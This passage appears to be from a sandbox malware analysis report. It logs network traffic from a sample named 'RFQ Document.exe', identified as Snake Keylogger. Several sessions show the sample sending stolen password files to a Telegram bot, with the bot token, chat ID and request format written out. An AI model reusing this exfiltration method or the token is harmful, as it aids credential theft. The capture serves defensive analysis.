2021-09-28 05:58:25 UTC	38	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 62 62 39 39 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c4bb9991Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:25 UTC	38	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:25 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:25 UTC	39	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12604,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808705,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
240	192.168.2.4	50061	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:36 UTC	381	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ef16d25f Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:36 UTC	382	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 31 36 64 32 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ef16d25fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:36 UTC	382	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:36 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:36 UTC	382	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12827,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808776,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
241	192.168.2.4	50062	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:37 UTC	383	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ef526da2 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:37 UTC	383	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 35 32 36 64 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ef526da2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:37 UTC	384	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:37 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:37 UTC	384	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12828,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
242	192.168.2.4	50063	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:37 UTC	385	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ef716bed Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:37 UTC	385	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 37 31 36 62 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ef716bedContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:37 UTC	385	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:37 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:37 UTC	386	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12829,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
243	192.168.2.4	50065	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:37 UTC	386	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ef89435d Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:37 UTC	386	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 38 39 34 33 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ef89435dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:37 UTC	387	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:37 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:37 UTC	387	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12830,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
244	192.168.2.4	50066	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:37 UTC	388	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ef9eb898 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:37 UTC	388	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 39 65 62 38 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ef9eb898Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:37 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:37 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:37 UTC	389	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12831,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
245	192.168.2.4	50067	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:37 UTC	389	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255efc4de56 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:37 UTC	390	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 63 34 64 65 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255efc4de56Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:37 UTC	390	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:37 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:37 UTC	390	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12833,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
246	192.168.2.4	50068	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:37 UTC	391	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255efdcb580 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:37 UTC	391	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 64 63 62 35 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255efdcb580Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
